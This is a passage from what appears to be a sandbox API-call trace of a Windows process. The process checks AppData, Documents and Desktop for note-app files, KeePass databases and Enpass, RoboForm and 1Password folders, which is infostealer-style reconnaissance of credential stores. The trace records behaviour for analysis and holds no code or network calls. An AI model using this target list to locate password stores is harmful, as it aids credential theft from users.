dwReserved1=0x19f954, cFileName="ը睉", cAlternateFileName="⦰螚䇆ᅣ䇰ﭜ\x19䂑@")) returned 0xffffffff [0148.401] GetProcessHeap () returned 0x690000 [0148.401] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa740 | out: hHeap=0x690000) returned 1 [0148.402] GetProcessHeap () returned 0x690000 [0148.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.402] GetProcessHeap () returned 0x690000 [0148.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.412] GetProcessHeap () returned 0x690000 [0148.412] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b3e0 | out: hHeap=0x690000) returned 1 [0148.412] GetProcessHeap () returned 0x690000 [0148.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f74) returned 0x6aca08 [0148.413] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.414] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\To-Do DeskList\\tasks.db", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\To-Do DeskList\\tasks.db") returned 61 [0148.414] GetProcessHeap () returned 0x690000 [0148.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7e) returned 0x6aa2c8 [0148.414] GetProcessHeap () returned 0x690000 [0148.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.416] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.416] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\To-Do DeskList\\tasks.db") returned 0 [0148.416] GetProcessHeap () returned 0x690000 [0148.416] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.417] GetProcessHeap () returned 0x690000 [0148.417] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x12c) returned 0x6aa2c8 [0148.417] GetProcessHeap () returned 0x690000 [0148.417] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b530 [0148.417] GetProcessHeap () returned 0x690000 [0148.417] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.417] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.418] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0148.418] GetProcessHeap () returned 0x690000 [0148.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6aca08 [0148.420] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.433] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\stickies\\images", arglist=0x19fb24 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\images") returned 53 [0148.433] GetProcessHeap () returned 0x690000 [0148.433] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6e) returned 0x6aa740 [0148.433] GetProcessHeap () returned 0x690000 [0148.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.435] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\images") returned 0 [0148.435] GetProcessHeap () returned 0x690000 [0148.436] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.436] GetProcessHeap () returned 0x690000 [0148.436] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa740 | out: hHeap=0x690000) returned 1 [0148.436] GetProcessHeap () returned 0x690000 [0148.436] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.437] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.438] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0148.438] GetProcessHeap () returned 0x690000 [0148.438] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6aca08 [0148.439] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.440] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\stickies\\rtf", arglist=0x19fb0c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\rtf") returned 50 [0148.440] GetProcessHeap () returned 0x690000 [0148.440] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x68) returned 0x6aa740 [0148.440] GetProcessHeap () returned 0x690000 [0148.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.441] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\rtf") returned 0 [0148.442] GetProcessHeap () returned 0x690000 [0148.442] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.443] GetProcessHeap () returned 0x690000 [0148.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa740 | out: hHeap=0x690000) returned 1 [0148.443] GetProcessHeap () returned 0x690000 [0148.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.444] GetProcessHeap () returned 0x690000 [0148.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b530 | out: hHeap=0x690000) returned 1 [0148.444] GetProcessHeap () returned 0x690000 [0148.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x12c) returned 0x6aa2c8 [0148.444] GetProcessHeap () returned 0x690000 [0148.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b530 [0148.444] GetProcessHeap () returned 0x690000 [0148.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.445] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.445] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0148.445] GetProcessHeap () returned 0x690000 [0148.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f60) returned 0x6aca08 [0148.446] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.447] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\NoteFly\\notes", arglist=0x19fb54 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NoteFly\\notes") returned 51 [0148.447] GetProcessHeap () returned 0x690000 [0148.447] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6a) returned 0x6aa740 [0148.447] GetProcessHeap () returned 0x690000 [0148.448] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.449] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NoteFly\\notes") returned 0 [0148.449] GetProcessHeap () returned 0x690000 [0148.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.450] GetProcessHeap () returned 0x690000 [0148.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa740 | out: hHeap=0x690000) returned 1 [0148.450] GetProcessHeap () returned 0x690000 [0148.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.450] GetProcessHeap () returned 0x690000 [0148.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b530 | out: hHeap=0x690000) returned 1 [0148.450] GetProcessHeap () returned 0x690000 [0148.451] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f86) returned 0x6aca08 [0148.451] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.452] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\Conceptworld\\Notezilla\\Notes8.db", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Conceptworld\\Notezilla\\Notes8.db") returned 70 [0148.452] GetProcessHeap () returned 0x690000 [0148.452] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x90) returned 0x6aa2c8 [0148.452] GetProcessHeap () returned 0x690000 [0148.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.454] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.454] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Conceptworld\\Notezilla\\Notes8.db") returned 0 [0148.454] GetProcessHeap () returned 0x690000 [0148.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.455] GetProcessHeap () returned 0x690000 [0148.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f92) returned 0x6aca08 [0148.457] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.458] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\Microsoft\\Sticky Notes\\StickyNotes.snt", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt") returned 76 [0148.458] GetProcessHeap () returned 0x690000 [0148.458] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x9c) returned 0x69b178 [0148.458] GetProcessHeap () returned 0x690000 [0148.458] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.459] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt") returned 0 [0148.460] GetProcessHeap () returned 0x690000 [0148.460] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b178 | out: hHeap=0x690000) returned 1 [0148.460] GetProcessHeap () returned 0x690000 [0148.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.461] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.461] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0148.461] GetProcessHeap () returned 0x690000 [0148.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f44) returned 0x6aca08 [0148.462] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.463] wvsprintfW (in: param_1=0x6aca08, param_2="%s", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 31 [0148.463] GetProcessHeap () returned 0x690000 [0148.463] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x42) returned 0x6ab068 [0148.463] GetProcessHeap () returned 0x690000 [0148.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.464] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 1 [0148.465] GetProcessHeap () returned 0x690000 [0148.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.467] Sleep (dwMilliseconds=0xa) [0148.537] GetProcessHeap () returned 0x690000 [0148.537] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6aca08 [0148.538] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.539] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\%s", arglist=0x19f8e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdbx") returned 38 [0148.539] GetProcessHeap () returned 0x690000 [0148.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x50) returned 0x6aa2c8 [0148.539] GetProcessHeap () returned 0x690000 [0148.540] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.547] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdbx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.kdbx"), lpFindFileData=0x19f8f4 | out: lpFindFileData=0x19f8f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="끨jꔰj")) returned 0xffffffff [0148.547] GetProcessHeap () returned 0x690000 [0148.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.548] GetProcessHeap () returned 0x690000 [0148.549] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab068 | out: hHeap=0x690000) returned 1 [0148.549] GetProcessHeap () returned 0x690000 [0148.549] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.550] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.551] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0148.551] GetProcessHeap () returned 0x690000 [0148.551] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f44) returned 0x6aca08 [0148.551] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.552] wvsprintfW (in: param_1=0x6aca08, param_2="%s", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 29 [0148.552] GetProcessHeap () returned 0x690000 [0148.552] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4100 [0148.552] GetProcessHeap () returned 0x690000 [0148.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.554] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.554] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0148.554] GetProcessHeap () returned 0x690000 [0148.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.556] Sleep (dwMilliseconds=0xa) [0148.601] GetProcessHeap () returned 0x690000 [0148.601] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6aca08 [0148.602] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.603] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\%s", arglist=0x19f8c8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdbx") returned 36 [0148.603] GetProcessHeap () returned 0x690000 [0148.603] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4c) returned 0x6aa2c8 [0148.603] GetProcessHeap () returned 0x690000 [0148.604] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.604] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdbx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.kdbx"), lpFindFileData=0x19f8dc | out: lpFindFileData=0x19f8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="䄀jꔰj")) returned 0xffffffff [0148.604] GetProcessHeap () returned 0x690000 [0148.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.605] GetProcessHeap () returned 0x690000 [0148.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4100 | out: hHeap=0x690000) returned 1 [0148.605] GetProcessHeap () returned 0x690000 [0148.605] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.606] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.606] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0148.607] GetProcessHeap () returned 0x690000 [0148.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f44) returned 0x6aca08 [0148.607] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.609] wvsprintfW (in: param_1=0x6aca08, param_2="%s", arglist=0x19fb30 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 31 [0148.609] GetProcessHeap () returned 0x690000 [0148.609] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x42) returned 0x6ab068 [0148.609] GetProcessHeap () returned 0x690000 [0148.609] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.610] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 1 [0148.611] GetProcessHeap () returned 0x690000 [0148.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.612] Sleep (dwMilliseconds=0xa) [0148.624] GetProcessHeap () returned 0x690000 [0148.624] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6aca08 [0148.625] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.625] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\%s", arglist=0x19f8b0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdb") returned 37 [0148.626] GetProcessHeap () returned 0x690000 [0148.626] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4e) returned 0x6aa2c8 [0148.626] GetProcessHeap () returned 0x690000 [0148.626] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.627] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdb" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.kdb"), lpFindFileData=0x19f8c4 | out: lpFindFileData=0x19f8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="끨jꔰj")) returned 0xffffffff [0148.627] GetProcessHeap () returned 0x690000 [0148.627] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.627] GetProcessHeap () returned 0x690000 [0148.628] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab068 | out: hHeap=0x690000) returned 1 [0148.628] GetProcessHeap () returned 0x690000 [0148.628] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.629] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.629] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0148.629] GetProcessHeap () returned 0x690000 [0148.629] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f44) returned 0x6aca08 [0148.630] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.631] wvsprintfW (in: param_1=0x6aca08, param_2="%s", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 29 [0148.631] GetProcessHeap () returned 0x690000 [0148.631] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0148.631] GetProcessHeap () returned 0x690000 [0148.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.633] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0148.633] GetProcessHeap () returned 0x690000 [0148.634] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.635] Sleep (dwMilliseconds=0xa) [0148.651] GetProcessHeap () returned 0x690000 [0148.651] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6aca08 [0148.652] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.653] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\%s", arglist=0x19f8e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdb") returned 35 [0148.653] GetProcessHeap () returned 0x690000 [0148.653] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4a) returned 0x6aa2c8 [0148.653] GetProcessHeap () returned 0x690000 [0148.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.654] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdb" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.kdb"), lpFindFileData=0x19f8f4 | out: lpFindFileData=0x19f8f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="䐘jꔰj")) returned 0xffffffff [0148.654] GetProcessHeap () returned 0x690000 [0148.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.664] GetProcessHeap () returned 0x690000 [0148.665] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0148.665] GetProcessHeap () returned 0x690000 [0148.665] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.666] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.666] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0148.666] GetProcessHeap () returned 0x690000 [0148.666] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f52) returned 0x6aca08 [0148.667] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.668] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\Enpass", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Enpass") returned 38 [0148.668] GetProcessHeap () returned 0x690000 [0148.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x50) returned 0x6aa740 [0148.668] GetProcessHeap () returned 0x690000 [0148.668] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.669] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.669] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\Enpass") returned 0 [0148.670] GetProcessHeap () returned 0x690000 [0148.671] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.671] GetProcessHeap () returned 0x690000 [0148.671] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa740 | out: hHeap=0x690000) returned 1 [0148.671] GetProcessHeap () returned 0x690000 [0148.671] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.672] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.672] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0148.672] GetProcessHeap () returned 0x690000 [0148.672] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f66) returned 0x6aca08 [0148.673] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.674] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\My RoboForm Data", arglist=0x19fb68 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My RoboForm Data") returned 48 [0148.674] GetProcessHeap () returned 0x690000 [0148.674] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x64) returned 0x6aa740 [0148.674] GetProcessHeap () returned 0x690000 [0148.674] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.675] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\My RoboForm Data") returned 0 [0148.675] GetProcessHeap () returned 0x690000 [0148.675] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa740 | out: hHeap=0x690000) returned 1 [0148.675] GetProcessHeap () returned 0x690000 [0148.676] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.676] GetProcessHeap () returned 0x690000 [0148.676] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.676] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.677] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0148.677] GetProcessHeap () returned 0x690000 [0148.677] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f58) returned 0x6aca08 [0148.677] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.678] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\1Password", arglist=0x19fb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\1Password") returned 41 [0148.678] GetProcessHeap () returned 0x690000 [0148.678] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x56) returned 0x6aa740 [0148.678] GetProcessHeap () returned 0x690000 [0148.679] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.680] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\1Password") returned 0 [0148.680] GetProcessHeap () returned 0x690000 [0148.680] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa740 | out: hHeap=0x690000) returned 1 [0148.681] GetProcessHeap () returned 0x690000 [0148.681] HeapFree 